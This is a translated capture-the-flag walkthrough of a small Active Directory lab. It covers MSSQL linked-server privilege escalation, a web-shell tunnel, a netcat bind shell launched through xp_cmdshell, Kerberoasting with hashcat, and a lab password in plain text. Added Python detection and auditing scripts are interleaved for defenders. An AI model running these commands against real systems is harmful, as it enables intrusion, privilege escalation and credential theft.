In this article we will analyze the passage not of a single machine, but of a whole mini-lab from the site
As stated in the description, POO is designed to test skills at all stages of an attack in a small Active Directory environment. The goal is to compromise an accessible host, escalate privileges, and ultimately compromise the entire domain while collecting 5 flags.
Connection to the lab is via VPN. It is recommended not to connect from a work computer or from a host where you have data that is important to you, since you end up on a private network with people who know a thing or two about information security :)
Organizational information
So that you can find out about new articles, software and other information, I created
All information is provided for educational purposes only. The author of this document accepts no responsibility for any damage caused to anyone as a result of using the knowledge and methods obtained by studying this document.
Intro
This endgame consists of two machines and has 5 flags.
A description and the address of the available host are also given.
Let's begin!
Recon flag
This machine has the IP address 10.13.38.11, which I added to /etc/hosts.
10.13.38.11 poo.htb
First, we check for open ports. Since scanning all ports with nmap takes a long time, I will first do it with masscan. We scan all TCP and UDP ports from the tun0 interface at a rate of 500 packets per second.
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
Now, to get more detailed information about the services running on these ports, let's run a scan with the -A option.
nmap -A poo.htb -p80,1433
So we have the IIS and MSSQL services. In this case we also learn the real DNS name of the domain and of the computer. On the web server we are greeted by the IIS home page.
Let's go through the directories. I use gobuster for this. In the parameters we specify the number of threads, 128 (-t), the URL (-u), the dictionary (-w) and the extensions we are interested in (-x).
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
This gives us HTTP authentication on the /admin directory, as well as an accessible .DS_Store file. .DS_Store files store custom settings for a folder, such as the list of files, icon positions, and the chosen background image. Such a file can end up in a web developer's web server directory. In this way we obtain information about the contents of the directory. For this you can use
python3 dsstore_crawler.py -i http://poo.htb/
We get the contents of the directory. The most interesting thing here is the /dev directory, in which we can see sources and db files in two branches. But if the service is vulnerable to IIS ShortName, we can also make use of the first 6 characters of file and directory names. You can check for this vulnerability using
And we find a text file whose name starts with "poo_co". Not knowing what to do next, I simply selected all the words that start with "co" from the directory dictionary.
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt
And we will brute-force it with wfuzz.
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
And we find the right word! We look at this file and find credentials (judging by the DBNAME parameter, they are for MSSQL).
We submit the flag and have 20% progress.
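From the defender's side, the recon steps above leave a recognizable trail in the IIS logs: requests for .DS_Store, tilde (8.3 short-name) probes, and a burst of 404s from one client while the dictionary is run through. The Python below is an added detection example, not code from the article or from any tool it uses; the log lines are constructed in a reduced IIS W3C layout (the field subset in FIELDS), the file names are made up to match the poo_FUZZ.txt pattern, and the threshold of five 404s per directory is an assumed tuning value.

```python
import re
from collections import defaultdict

# Field order of the constructed sample below (a subset of the IIS W3C fields).
FIELDS = ("date", "time", "c_ip", "method", "uri_stem", "uri_query", "status")

# Constructed log lines modelled on the recon steps of the walkthrough; not lab logs.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2020-01-01 10:00:01 10.10.14.5 GET /.DS_Store - 200
2020-01-01 10:00:02 10.10.14.5 GET /dev/.DS_Store - 200
2020-01-01 10:00:05 10.10.14.5 GET /*~1*/.aspx - 404
2020-01-01 10:00:05 10.10.14.5 GET /a*~1*/.aspx - 404
2020-01-01 10:00:06 10.10.14.5 GET /d*~1*/.aspx - 404
2020-01-01 10:00:20 10.10.14.5 GET /dev/db/poo_cab.txt - 404
2020-01-01 10:00:20 10.10.14.5 GET /dev/db/poo_cache.txt - 404
2020-01-01 10:00:21 10.10.14.5 GET /dev/db/poo_cake.txt - 404
2020-01-01 10:00:21 10.10.14.5 GET /dev/db/poo_calc.txt - 404
2020-01-01 10:00:22 10.10.14.5 GET /dev/db/poo_camp.txt - 404
2020-01-01 10:00:22 10.10.14.5 GET /dev/db/poo_card.txt - 404
2020-01-01 10:00:23 10.10.14.5 GET /dev/db/poo_co_example.txt - 200
2020-01-01 10:05:00 192.168.1.20 GET /index.html - 200
"""


def parse_iis_log(text):
    """Turn W3C lines into dicts keyed by FIELDS; '#' directive lines are skipped."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        rows.append(dict(zip(FIELDS, line.split())))
    return rows


def metadata_file_requests(rows):
    """Requests for developer/OS metadata that a web root should never serve."""
    leaked = (".ds_store", ".git/", ".svn/", "web.config")
    return [r for r in rows if any(m in r["uri_stem"].lower() for m in leaked)]


def shortname_probes(rows):
    """IIS 8.3 short-name enumeration requests carry a tilde plus digit in the path."""
    return [r for r in rows if re.search(r"~[1-9]", r["uri_stem"])]


def enumeration_bursts(rows, threshold=5):
    """Clients producing `threshold` or more 404s inside one directory: dictionary
    brute forcing. Returns {(client_ip, directory): count}."""
    counts = defaultdict(int)
    for r in rows:
        if r["status"] == "404":
            directory = r["uri_stem"].rsplit("/", 1)[0] + "/"
            counts[(r["c_ip"], directory)] += 1
    return {key: n for key, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    rows = parse_iis_log(SAMPLE_LOG)
    print("metadata files:", [r["uri_stem"] for r in metadata_file_requests(rows)])
    print("short-name probes:", len(shortname_probes(rows)))
    print("enumeration bursts:", enumeration_bursts(rows))
```

The first two detectors are cheap exact-match rules; the third is where the tuning lives, since a single dictionary run produces hundreds of 404s in one directory while normal users produce a handful. On the hardening side, .DS_Store and similar files should be excluded from deployments, and 8.3 short-name generation can be disabled on the volume so the tilde probes have nothing to reveal.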
Huh flag
We connect to MSSQL; I use DBeaver.
We don't find anything interesting in this database, so let's open an SQL editor and check which users exist.
SELECT name FROM master..syslogins;
We have two users. Let's check our privileges.
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
So, no privileges. Let's look at the linked servers; I wrote about this technique in detail
SELECT * FROM master..sysservers;
This is how we find another SQL server. Let's test executing queries on this server using openquery().
SELECT version FROM openquery("COMPATIBILITY\POO_CONFIG", 'select @@version as version');
And we can even build a tree of nested queries.
SELECT version FROM openquery("COMPATIBILITY\POO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITY\POO_PUBLIC", ''select @@version as version'');');
The point is that when we make a query to a linked server, the query is executed in the context of another user! Let's look at the name of the user under which we are operating on the linked server.
SELECT name FROM openquery("COMPATIBILITY\POO_CONFIG", 'SELECT user_name() as name');
Now let's see in which context a query is executed from the linked server back to our own!
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITY\POO_PUBLIC", ''SELECT user_name() as name'');');
So it is the dbo context, which should have all privileges. Let's check the privileges in the case of a query coming from the linked server.
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITY\POO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
As you can see, we have all privileges! So let's create our own admin. But such statements are not allowed through openquery, so let's do it via EXECUTE AT.
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
And now we connect with the new user's credentials and notice a new flag database.
We submit this flag and continue.
BackTrack flag
Let's get a shell via MSSQL; I use mssqlclient from the impacket package.
mssqlclient.py ralf:ralfralf@poo.htb -db POO_PUBLIC
We need to obtain passwords, and the first thing we have already encountered is a website. So we need the web server configuration (it isn't possible to break out of this simple shell; apparently a firewall is running).
But access is denied. Although we can read the file from MSSQL, we only need to know which programming languages are configured. And in the MSSQL directory we find that Python is present.
Then there is no problem reading the web.config file.
EXEC sp_execute_external_script
    @language = N'Python',
    @script = N'print(open(r"C:\inetpub\wwwroot\web.config").read())';
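What the walkthrough exploits in the last two sections is a linked-server loop whose login mapping comes back as a sysadmin, plus server-level options (xp_cmdshell, external scripts enabled) that turn database access into file and command access. The Python below is an added auditing example, not code from the article or from SQL Server; it reasons over rows shaped like the output of sys.servers, sys.linked_logins and sys.configurations (AUDIT_SQL is a starting query for pulling the mappings), and the instance names, logins and option values are all constructed.

```python
# Query returning the linked-server login mappings this script reasons about.
# Run it on each instance; the catalog views are real, the rows below are constructed.
AUDIT_SQL = """
SELECT s.name, s.is_rpc_out_enabled, l.uses_self_credential, l.remote_name
FROM sys.servers AS s
JOIN sys.linked_logins AS l ON l.server_id = s.server_id
WHERE s.is_linked = 1;
"""

# Constructed linked-server definitions keyed by the instance they are defined on.
# remote_login is the login the remote side sees after the hop; None models
# uses_self_credential = 1 (the caller's own login is forwarded unchanged).
LINKED = {
    "SRV_PUBLIC": [{"target": "SRV_CONFIG", "remote_login": "config_reader"}],
    "SRV_CONFIG": [{"target": "SRV_PUBLIC", "remote_login": "sa"}],
}
# Constructed sysadmin membership per instance.
SYSADMINS = {"SRV_PUBLIC": {"sa", "dbadmin"}, "SRV_CONFIG": {"sa"}}

# Constructed (name, value_in_use) pairs as sys.configurations would return them.
CONFIG_ROWS = [
    ("xp_cmdshell", 1),
    ("external scripts enabled", 1),
    ("Ole Automation Procedures", 0),
    ("clr enabled", 0),
]
# Options that let a database login run code or scripts on the host.
RISKY_OPTIONS = {"xp_cmdshell", "external scripts enabled",
                 "Ole Automation Procedures", "clr enabled"}


def privileged_loops(linked, sysadmins, start, login, max_hops=4):
    """Hop sequences that begin on `start` as `login` and arrive back on `start`
    as a sysadmin login: the openquery / EXECUTE AT elevation path shown above.
    Each hop is (from_server, to_server, login_after_hop)."""
    if login in sysadmins.get(start, set()):
        return []  # already sysadmin locally, nothing to elevate
    found = []

    def walk(server, current_login, path):
        if len(path) >= max_hops:
            return  # bound the search; real topologies can contain cycles
        for link in linked.get(server, []):
            nxt = link["target"]
            arrived_as = link["remote_login"] or current_login
            hops = path + [(server, nxt, arrived_as)]
            if nxt == start:
                if arrived_as in sysadmins.get(start, set()):
                    found.append(hops)
            else:
                walk(nxt, arrived_as, hops)

    walk(start, login, [])
    return found


def risky_configurations(rows):
    """Names of code-execution options that are switched on."""
    return sorted(name for name, value in rows
                  if name in RISKY_OPTIONS and value == 1)


if __name__ == "__main__":
    for loop in privileged_loops(LINKED, SYSADMINS, "SRV_PUBLIC", "app_user"):
        print("elevation loop:", " -> ".join(f"{a}->{b} as {who}" for a, b, who in loop))
    print("risky options enabled:", risky_configurations(CONFIG_ROWS))
```

The loop finder reports exactly the situation the walkthrough relies on: a low-privileged login on SRV_PUBLIC hops to SRV_CONFIG as config_reader, and the mapping defined on SRV_CONFIG brings it back as sa. The fix is on the mapping side: linked logins should map to a dedicated remote login holding only the rights the integration needs, never to sa or another sysadmin, and options listed by risky_configurations should stay disabled on instances that do not need them.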
With the credentials found, go to /admin and take the flag.
Foothold flag
Honestly, the firewall causes some inconvenience, but looking through the network settings, we notice that IPv6 is also in use!
Let's add this address to /etc/hosts.
dead:babe::1001 poo6.htb
Let's scan the host again, but over IPv6.
And the WinRM service is available over IPv6. Let's connect with the credentials found.
The flag is on the desktop; we submit it.
P00ned flag
After conducting reconnaissance on the host using
setspn.exe -T intranet.poo -Q */*
Let's run the command via MSSQL.
Using this method we obtain the SPNs of the users p00_hr and p00_adm, which means they are vulnerable to an attack such as Kerberoasting. In short, we can obtain their password hashes.
First you need to get a stable shell as the MSSQL user. But since access is restricted, we can only communicate with the host over ports 80 and 1433. But it is possible to tunnel traffic through port 80! For this we will use
But when we try to access it, we get a 404 error. This means that *.aspx files are not being processed. In order for files with this extension to work, install ASP.NET 4.5 as follows.
dism /online /enable-feature /all /featurename:IIS-ASPNET45
And now, when we access tunnel.aspx, we get a response that everything is ready to go.
Let's launch the client part of the application, which will forward the traffic. We will redirect all traffic from port 5432 to the server.
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
And we use proxychains to send any application's traffic through our proxy. Let's add this proxy to the configuration file /etc/proxychains.conf.
Now let's upload the programs to the server
Now we launch a listener via MSSQL.
xp_cmdshell C:\temp\nc64.exe -e powershell.exe -lvp 4321
And we connect through our proxy.
proxychains rlwrap nc poo.htb 4321
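The tunnel used above turns every TCP segment into an HTTP request to one .aspx page, so on the server it looks like a single client hammering one script with small POSTs. The Python below is an added detection example, not part of the article or of reGeorg; the log lines are constructed in a reduced IIS W3C layout, the cmd=connect/forward/read/disconnect verbs in the query string are modelled on the pattern the reGeorg ASPX tunnel reads (taken here as an assumption about that tool), and the 60-second window and threshold of eight POSTs are assumed tuning values.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

FIELDS = ("date", "time", "c_ip", "method", "uri_stem", "uri_query", "status")
TUNNEL_VERBS = {"connect", "forward", "read", "disconnect"}

# Constructed lines: the readiness check, then one tunnelled session (connect to a
# local port followed by read/forward polling) and some unrelated traffic.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2020-01-01 10:19:55 10.10.14.5 GET /tunnel.aspx - 200
2020-01-01 10:20:01 10.10.14.5 POST /tunnel.aspx cmd=connect&target=127.0.0.1&port=4321 200
2020-01-01 10:20:02 10.10.14.5 POST /tunnel.aspx cmd=read 200
2020-01-01 10:20:02 10.10.14.5 POST /tunnel.aspx cmd=forward 200
2020-01-01 10:20:03 10.10.14.5 POST /tunnel.aspx cmd=read 200
2020-01-01 10:20:04 10.10.14.5 POST /tunnel.aspx cmd=read 200
2020-01-01 10:20:05 10.10.14.5 POST /tunnel.aspx cmd=forward 200
2020-01-01 10:20:06 10.10.14.5 POST /tunnel.aspx cmd=read 200
2020-01-01 10:20:07 10.10.14.5 POST /tunnel.aspx cmd=forward 200
2020-01-01 10:20:09 10.10.14.5 POST /tunnel.aspx cmd=read 200
2020-01-01 10:25:00 192.168.1.20 GET /index.html - 200
"""


def parse_iis_log(text):
    """W3C lines to dicts keyed by FIELDS; '#' directive lines are skipped."""
    return [dict(zip(FIELDS, line.split()))
            for line in text.splitlines() if line.strip() and not line.startswith("#")]


def tunnel_commands(rows):
    """Signature rule: the query string starts with a tunnel verb (cmd=connect, ...)."""
    hits = []
    for r in rows:
        m = re.match(r"cmd=(\w+)", r["uri_query"], re.IGNORECASE)
        if m and m.group(1).lower() in TUNNEL_VERBS:
            hits.append(r)
    return hits


def post_hammering(rows, window=timedelta(seconds=60), threshold=8):
    """Behavioural rule: one client POSTing to the same .aspx `threshold` or more
    times within `window`. Returns {(client_ip, script): max_requests_in_window}."""
    by_key = defaultdict(list)
    for r in rows:
        if r["method"] == "POST" and r["uri_stem"].lower().endswith(".aspx"):
            stamp = datetime.strptime(r["date"] + " " + r["time"], "%Y-%m-%d %H:%M:%S")
            by_key[(r["c_ip"], r["uri_stem"])].append(stamp)
    flagged = {}
    for key, times in by_key.items():
        times.sort()
        best, start = 0, 0
        for end, t in enumerate(times):          # sliding window over sorted times
            while t - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[key] = best
    return flagged


if __name__ == "__main__":
    rows = parse_iis_log(SAMPLE_LOG)
    print("tunnel verbs seen:", len(tunnel_commands(rows)))
    print("hammered scripts:", post_hammering(rows))
```

The signature rule catches this particular tool; the rate rule is the one worth keeping, because any HTTP-multiplexed tunnel has to poll the page continuously. Note also what made the tunnel possible in the first place: the web root was writable from the database service account and a new handler (ASP.NET) could be enabled from a database shell, both of which a file-integrity or configuration-change alert on the web server would have surfaced.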
And let's get the hashes.
. .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:\temp\kerb_hashes.txt' -Width 8000
type kerb_hashes.txt
Next we need to brute-force these hashes. Since the rockyou dictionary does not contain these passwords, I used ALL the password dictionaries provided in SecLists. For the search we use hashcat.
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force
And we find both passwords: the first in the dutch_passwordlist.txt dictionary, and the second in Keyboard-Combinations.txt.
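Kerberoasting as performed above asks the KDC for service tickets for user accounts that have SPNs, and every such request is logged on the domain controller as event 4769. The Python below is an added detection example, not code from the article, Invoke-Kerberoast or hashcat; the 4769 records are constructed (the requesting account svc-sql is made up, the service and realm names are taken from the article), and the five-minute window and two-service threshold are assumed values.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC tickets

# Constructed 4769 (Kerberos service ticket requested) events using the field names
# of the Windows Security log. Not events from the lab's domain controller.
EVENTS = [
    {"time": "2020-01-01 11:00:00", "TargetUserName": "svc-sql@INTRANET.POO",
     "ServiceName": "p00_hr", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.13.38.11"},
    {"time": "2020-01-01 11:00:00", "TargetUserName": "svc-sql@INTRANET.POO",
     "ServiceName": "p00_adm", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.13.38.11"},
    {"time": "2020-01-01 11:00:01", "TargetUserName": "svc-sql@INTRANET.POO",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.13.38.11"},
    # Benign: an AES ticket for a machine-account SPN, and a normal user's AES
    # ticket for one of the same service names.
    {"time": "2020-01-01 11:30:00", "TargetUserName": "alice@INTRANET.POO",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.13.38.20"},
    {"time": "2020-01-01 11:31:00", "TargetUserName": "bob@INTRANET.POO",
     "ServiceName": "p00_hr", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.13.38.21"},
]


def _stamp(value):
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S")


def suspicious_tgs_requests(events):
    """RC4 service tickets for SPNs on user accounts (not machine accounts ending
    in $, not krbtgt): the ticket type Kerberoast tools request because its hash
    is the cheapest to crack offline."""
    out = []
    for e in events:
        svc = e["ServiceName"]
        if (e["TicketEncryptionType"].lower() == RC4_HMAC
                and not svc.endswith("$") and svc.lower() != "krbtgt"):
            out.append(e)
    return out


def kerberoast_bursts(events, window=timedelta(minutes=5), threshold=2):
    """Requesting accounts that asked for `threshold` or more distinct user-account
    SPNs within `window`. Returns {account: sorted services}."""
    by_user = defaultdict(list)
    for e in suspicious_tgs_requests(events):
        by_user[e["TargetUserName"]].append((_stamp(e["time"]), e["ServiceName"]))
    flagged = {}
    for user, items in by_user.items():
        items.sort()
        for t0, _ in items:  # try each request as the start of a window
            services = {svc for t, svc in items if t0 <= t <= t0 + window}
            if len(services) >= threshold:
                flagged[user] = sorted(services)
                break
    return flagged


if __name__ == "__main__":
    print("RC4 tickets for user SPNs:", len(suspicious_tgs_requests(EVENTS)))
    print("kerberoast bursts:", kerberoast_bursts(EVENTS))
```

The encryption-type filter is what separates this from normal Kerberos noise: a legitimate client on a modern domain gets AES tickets, so an RC4 ticket for a user-account SPN is already unusual, and several of them from one account in a short span is the roasting pattern. The durable fix is on the accounts themselves: long random passwords or group managed service accounts for anything with an SPN (the two passwords above were found in word lists), and restricting those accounts to AES via msDS-SupportedEncryptionTypes so that RC4 tickets are never issued for them.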
And so we have three users; let's move on to the domain controller. First we find its address.
Great, we find the IP address of the domain controller. Let's find out all the users of the domain, as well as which of them are in the IT group. To do this, download the PowerView.ps1 script for information gathering. Then we connect using evil-winrm, specifying the directory containing the script in the -s parameter. After that we simply load the PowerView script.
Now we have access to all of its functions. The user p00_adm looks like a privileged user, so we will work in its context. Let's create a PSCredential object for this user.
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass
Now all PowerShell commands in which we pass $Creds will be executed as p00_adm. Let's display the list of users along with the AdminCount attribute.
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
And so, our user is indeed privileged. Let's see which groups it is in.
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
Finally, we confirm that the user is a domain administrator. This grants the right to log in to the domain controller remotely. Let's try to log in via WinRM using our tunnel. I was thrown off by the errors reGeorg produced when used with evil-winrm.
So let's use another, simpler one,
We try to connect, and we are in the system.
But there is no flag. Then let's look at the users and check their desktops.
We find the flag with mr3ks and the lab is 100% complete.
That's all. As feedback, please comment on whether you learned anything new from this article and whether it was useful to you.
You can join us at
source: www.habr.com